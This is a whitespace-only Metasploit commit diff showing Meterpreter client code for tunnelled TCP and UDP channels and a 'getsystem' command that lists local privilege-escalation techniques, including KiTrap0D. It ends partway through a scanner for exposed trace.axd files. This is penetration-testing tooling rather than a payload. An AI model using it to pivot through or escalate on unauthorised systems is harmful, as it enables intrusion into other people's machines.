remove carriage returns
git-svn-id: file:///home/svn/framework3/trunk@9140 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
e3a1c63e98
commit
a953c47cfb
|
@ -1,167 +1,167 @@
|
|||
require 'timeout'
|
||||
require 'thread'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/channels/stream'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class TcpServerChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# This is a class variable to store all pending client tcp connections which have not been passed
|
||||
# off via a call to the respective server tcp channels accept method. The dictionary key is the
|
||||
# tcp server channel instance and the values held are an array of pending tcp client channels
|
||||
# connected to the tcp server channel.
|
||||
#
|
||||
@@server_channels = {}
|
||||
|
||||
class << self
|
||||
include Rex::Post::Meterpreter::InboundPacketHandler
|
||||
|
||||
#
|
||||
# This is the request handler which is registerd to the respective meterpreter instance via
|
||||
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
|
||||
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
|
||||
# received and store it in the respective tcp server channels list of new pending client channels.
|
||||
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
|
||||
#
|
||||
def request_handler( client, packet )
|
||||
|
||||
if( packet.method == "tcp_channel_open" )
|
||||
|
||||
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
|
||||
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
|
||||
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
|
||||
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( cid == nil or pid == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
server_channel = client.find_channel( pid )
|
||||
if( server_channel == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
params = Rex::Socket::Parameters.from_hash(
|
||||
{
|
||||
'Proto' => 'tcp',
|
||||
'LocalHost' => localhost,
|
||||
'LocalPort' => localport,
|
||||
'PeerHost' => peerhost,
|
||||
'PeerPort' => peerport,
|
||||
'Comm' => server_channel.client
|
||||
}
|
||||
)
|
||||
|
||||
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
|
||||
|
||||
client_channel.params = params
|
||||
|
||||
if( @@server_channels[server_channel] == nil )
|
||||
@@server_channels[server_channel] = []
|
||||
end
|
||||
|
||||
@@server_channels[server_channel] << client_channel
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
def cls
|
||||
return CHANNEL_CLASS_STREAM
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new tcp server channel on the remote end.
|
||||
#
|
||||
def TcpServerChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# add this instance to the class variables dictionary of tcp server channels
|
||||
@@server_channels[self] = []
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method does not block
|
||||
# and returns nil if no new client connection is available.
|
||||
#
|
||||
def accept_nonblock
|
||||
result = nil
|
||||
if( @@server_channels[self].length > 0 )
|
||||
channel = @@server_channels[self].shift
|
||||
result = channel.lsock
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
|
||||
# if no timeout is specified.
|
||||
#
|
||||
def accept( opts={} )
|
||||
timeout = opts['Timeout'] || -1
|
||||
if( timeout == -1 )
|
||||
result = _accept
|
||||
else
|
||||
begin
|
||||
::Timeout.timeout( timeout ) {
|
||||
result = _accept
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def _accept
|
||||
while( true )
|
||||
if( @@server_channels[self].empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = accept_nonblock
|
||||
break if result != nil
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
||||
require 'timeout'
|
||||
require 'thread'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/channels/stream'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class TcpServerChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# This is a class variable to store all pending client tcp connections which have not been passed
|
||||
# off via a call to the respective server tcp channels accept method. The dictionary key is the
|
||||
# tcp server channel instance and the values held are an array of pending tcp client channels
|
||||
# connected to the tcp server channel.
|
||||
#
|
||||
@@server_channels = {}
|
||||
|
||||
class << self
|
||||
include Rex::Post::Meterpreter::InboundPacketHandler
|
||||
|
||||
#
|
||||
# This is the request handler which is registerd to the respective meterpreter instance via
|
||||
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
|
||||
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
|
||||
# received and store it in the respective tcp server channels list of new pending client channels.
|
||||
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
|
||||
#
|
||||
def request_handler( client, packet )
|
||||
|
||||
if( packet.method == "tcp_channel_open" )
|
||||
|
||||
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
|
||||
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
|
||||
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
|
||||
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( cid == nil or pid == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
server_channel = client.find_channel( pid )
|
||||
if( server_channel == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
params = Rex::Socket::Parameters.from_hash(
|
||||
{
|
||||
'Proto' => 'tcp',
|
||||
'LocalHost' => localhost,
|
||||
'LocalPort' => localport,
|
||||
'PeerHost' => peerhost,
|
||||
'PeerPort' => peerport,
|
||||
'Comm' => server_channel.client
|
||||
}
|
||||
)
|
||||
|
||||
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
|
||||
|
||||
client_channel.params = params
|
||||
|
||||
if( @@server_channels[server_channel] == nil )
|
||||
@@server_channels[server_channel] = []
|
||||
end
|
||||
|
||||
@@server_channels[server_channel] << client_channel
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
def cls
|
||||
return CHANNEL_CLASS_STREAM
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new tcp server channel on the remote end.
|
||||
#
|
||||
def TcpServerChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# add this instance to the class variables dictionary of tcp server channels
|
||||
@@server_channels[self] = []
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method does not block
|
||||
# and returns nil if no new client connection is available.
|
||||
#
|
||||
def accept_nonblock
|
||||
result = nil
|
||||
if( @@server_channels[self].length > 0 )
|
||||
channel = @@server_channels[self].shift
|
||||
result = channel.lsock
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
|
||||
# if no timeout is specified.
|
||||
#
|
||||
def accept( opts={} )
|
||||
timeout = opts['Timeout'] || -1
|
||||
if( timeout == -1 )
|
||||
result = _accept
|
||||
else
|
||||
begin
|
||||
::Timeout.timeout( timeout ) {
|
||||
result = _accept
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def _accept
|
||||
while( true )
|
||||
if( @@server_channels[self].empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = accept_nonblock
|
||||
break if result != nil
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
||||
|
|
|
@ -1,192 +1,192 @@
|
|||
require 'timeout'
|
||||
require 'rex/sync/thread_safe'
|
||||
require 'rex/socket/udp'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class UdpChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
|
||||
#
|
||||
include Rex::Socket::Udp
|
||||
|
||||
#
|
||||
# We are a datagram channel.
|
||||
#
|
||||
class << self
|
||||
def cls
|
||||
return CHANNEL_CLASS_DATAGRAM
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
|
||||
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
|
||||
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
|
||||
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
|
||||
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
|
||||
#
|
||||
def UdpChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => params.peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => params.peerport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# the instance variable that holds all incoming datagrams.
|
||||
@datagrams = []
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
|
||||
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
|
||||
#
|
||||
def timed_read( length=65535, timeout=def_read_timeout )
|
||||
result = ''
|
||||
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = self.read( length )
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = ''
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
|
||||
# datagrams which the remote end of this channel has received and are in the
|
||||
# queue.
|
||||
#
|
||||
def recvfrom( length=65535, timeout=def_read_timeout )
|
||||
result = nil
|
||||
# force a timeout on the wait for an incoming datagram
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
# wait untill we have at least one datagram in the queue
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
# grab the oldest datagram we have received...
|
||||
result = @datagrams.shift
|
||||
# break as we have a result...
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
# if no result return nothing
|
||||
if( result == nil )
|
||||
return [ '', nil, nil ]
|
||||
end
|
||||
# get the data from this datagram
|
||||
data = result[0]
|
||||
# if its only a partial read of this datagram, slice it, loosing the remainder.
|
||||
result[0] = data[0,length-1] if data.length > length
|
||||
# return the result in the form [ data, host, port ]
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level sysread to read data off our datagram queue. Calls
|
||||
# to read() will end up calling this.
|
||||
#
|
||||
def sysread( length )
|
||||
result = self.recvfrom( length )
|
||||
return result[0]
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level syswrite to write data to the remote end of the channel.
|
||||
# Calls to write() will end up calling this.
|
||||
#
|
||||
def syswrite( buf )
|
||||
return _write( buf )
|
||||
end
|
||||
|
||||
#
|
||||
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
|
||||
# remote peer host/port via the remote end of the channel.
|
||||
#
|
||||
def send( buf, flags, saddr )
|
||||
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
|
||||
|
||||
addends = [
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => peerport
|
||||
}
|
||||
]
|
||||
|
||||
return _write( buf, buf.length, addends )
|
||||
end
|
||||
|
||||
#
|
||||
# The channels direct io write handler for any incoming data from the remote end
|
||||
# of the channel. We extract the data and peer host/port, and save this to a queue
|
||||
# of incoming datagrams which are passed out via calls to self.recvfrom()
|
||||
#
|
||||
def dio_write_handler( packet, data )
|
||||
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( peerhost and peerport )
|
||||
@datagrams << [ data, peerhost, peerport ]
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
require 'timeout'
|
||||
require 'rex/sync/thread_safe'
|
||||
require 'rex/socket/udp'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class UdpChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
|
||||
#
|
||||
include Rex::Socket::Udp
|
||||
|
||||
#
|
||||
# We are a datagram channel.
|
||||
#
|
||||
class << self
|
||||
def cls
|
||||
return CHANNEL_CLASS_DATAGRAM
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
|
||||
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
|
||||
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
|
||||
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
|
||||
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
|
||||
#
|
||||
def UdpChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => params.peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => params.peerport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# the instance variable that holds all incoming datagrams.
|
||||
@datagrams = []
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
|
||||
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
|
||||
#
|
||||
def timed_read( length=65535, timeout=def_read_timeout )
|
||||
result = ''
|
||||
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = self.read( length )
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = ''
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
|
||||
# datagrams which the remote end of this channel has received and are in the
|
||||
# queue.
|
||||
#
|
||||
def recvfrom( length=65535, timeout=def_read_timeout )
|
||||
result = nil
|
||||
# force a timeout on the wait for an incoming datagram
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
# wait untill we have at least one datagram in the queue
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
# grab the oldest datagram we have received...
|
||||
result = @datagrams.shift
|
||||
# break as we have a result...
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
# if no result return nothing
|
||||
if( result == nil )
|
||||
return [ '', nil, nil ]
|
||||
end
|
||||
# get the data from this datagram
|
||||
data = result[0]
|
||||
# if its only a partial read of this datagram, slice it, loosing the remainder.
|
||||
result[0] = data[0,length-1] if data.length > length
|
||||
# return the result in the form [ data, host, port ]
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level sysread to read data off our datagram queue. Calls
|
||||
# to read() will end up calling this.
|
||||
#
|
||||
def sysread( length )
|
||||
result = self.recvfrom( length )
|
||||
return result[0]
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level syswrite to write data to the remote end of the channel.
|
||||
# Calls to write() will end up calling this.
|
||||
#
|
||||
def syswrite( buf )
|
||||
return _write( buf )
|
||||
end
|
||||
|
||||
#
|
||||
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
|
||||
# remote peer host/port via the remote end of the channel.
|
||||
#
|
||||
def send( buf, flags, saddr )
|
||||
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
|
||||
|
||||
addends = [
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => peerport
|
||||
}
|
||||
]
|
||||
|
||||
return _write( buf, buf.length, addends )
|
||||
end
|
||||
|
||||
#
|
||||
# The channels direct io write handler for any incoming data from the remote end
|
||||
# of the channel. We extract the data and peer host/port, and save this to a queue
|
||||
# of incoming datagrams which are passed out via calls to self.recvfrom()
|
||||
#
|
||||
def dio_write_handler( packet, data )
|
||||
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( peerhost and peerport )
|
||||
@datagrams << [ data, peerhost, peerport ]
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
|
|
@ -1,98 +1,98 @@
|
|||
require 'rex/post/meterpreter'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Ui
|
||||
|
||||
###
|
||||
#
|
||||
# The local privilege escalation portion of the extension.
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
Klass = Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
include Console::CommandDispatcher
|
||||
|
||||
ELEVATE_TECHNIQUE_NONE = -1
|
||||
ELEVATE_TECHNIQUE_ANY = 0
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
|
||||
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
|
||||
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
|
||||
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
|
||||
"Service - Named Pipe Impersonation (In Memory/Admin)",
|
||||
"Service - Named Pipe Impersonation (Dropper/Admin)",
|
||||
"Service - Token Duplication (In Memory/Admin)",
|
||||
"Exploit - KiTrap0D (In Memory/User)"
|
||||
]
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
{
|
||||
"getsystem" => "Attempt to elevate your privilege to that of local system."
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Name for this dispatcher.
|
||||
#
|
||||
def name
|
||||
"Priv: Elevate"
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Attempt to elevate the meterpreter to that of local system.
|
||||
#
|
||||
def cmd_getsystem( *args )
|
||||
|
||||
technique = ELEVATE_TECHNIQUE_ANY
|
||||
|
||||
desc = ""
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
|
||||
|
||||
getsystem_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help Banner." ],
|
||||
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
|
||||
)
|
||||
|
||||
getsystem_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when "-h"
|
||||
print_line( "Usage: getsystem [options]\n" )
|
||||
print_line( "Attempt to elevate your privilege to that of local system." )
|
||||
print_line( getsystem_opts.usage )
|
||||
return
|
||||
when "-t"
|
||||
technique = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
|
||||
print_error( "Technique '#{technique}' is out of range." );
|
||||
return false;
|
||||
end
|
||||
|
||||
result = client.priv.getsystem( technique )
|
||||
|
||||
# got system?
|
||||
if result[0]
|
||||
print_line( "...got system (via technique #{result[1]})." );
|
||||
else
|
||||
print_line( "...failed to get system." );
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
require 'rex/post/meterpreter'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Ui
|
||||
|
||||
###
|
||||
#
|
||||
# The local privilege escalation portion of the extension.
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
Klass = Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
include Console::CommandDispatcher
|
||||
|
||||
ELEVATE_TECHNIQUE_NONE = -1
|
||||
ELEVATE_TECHNIQUE_ANY = 0
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
|
||||
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
|
||||
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
|
||||
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
|
||||
"Service - Named Pipe Impersonation (In Memory/Admin)",
|
||||
"Service - Named Pipe Impersonation (Dropper/Admin)",
|
||||
"Service - Token Duplication (In Memory/Admin)",
|
||||
"Exploit - KiTrap0D (In Memory/User)"
|
||||
]
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
{
|
||||
"getsystem" => "Attempt to elevate your privilege to that of local system."
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Name for this dispatcher.
|
||||
#
|
||||
def name
|
||||
"Priv: Elevate"
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Attempt to elevate the meterpreter to that of local system.
|
||||
#
|
||||
def cmd_getsystem( *args )
|
||||
|
||||
technique = ELEVATE_TECHNIQUE_ANY
|
||||
|
||||
desc = ""
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
|
||||
|
||||
getsystem_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help Banner." ],
|
||||
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
|
||||
)
|
||||
|
||||
getsystem_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when "-h"
|
||||
print_line( "Usage: getsystem [options]\n" )
|
||||
print_line( "Attempt to elevate your privilege to that of local system." )
|
||||
print_line( getsystem_opts.usage )
|
||||
return
|
||||
when "-t"
|
||||
technique = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
|
||||
print_error( "Technique '#{technique}' is out of range." );
|
||||
return false;
|
||||
end
|
||||
|
||||
result = client.priv.getsystem( technique )
|
||||
|
||||
# got system?
|
||||
if result[0]
|
||||
print_line( "...got system (via technique #{result[1]})." );
|
||||
else
|
||||
print_line( "...failed to get system." );
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,121 +1,121 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanDir
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'HTTP trace.axd Content Scanner',
|
||||
'Version' => '$Revision: 7605 $',
|
||||
'Description' => 'Detect trace.axd files and analize its content',
|
||||
'Author' => ['c4an'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
||||
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
begin
|
||||
turl = tpath+'trace.axd'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
|
||||
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
||||
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => 'TRACE_AXD',
|
||||
:data => "trace.axd"
|
||||
)
|
||||
|
||||
if datastore['TRACE_DETAILS']
|
||||
|
||||
aregex = /Trace.axd\?id=\d/
|
||||
result = res.body.scan(aregex).uniq
|
||||
|
||||
result.each do |u|
|
||||
turl = tpath+u.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
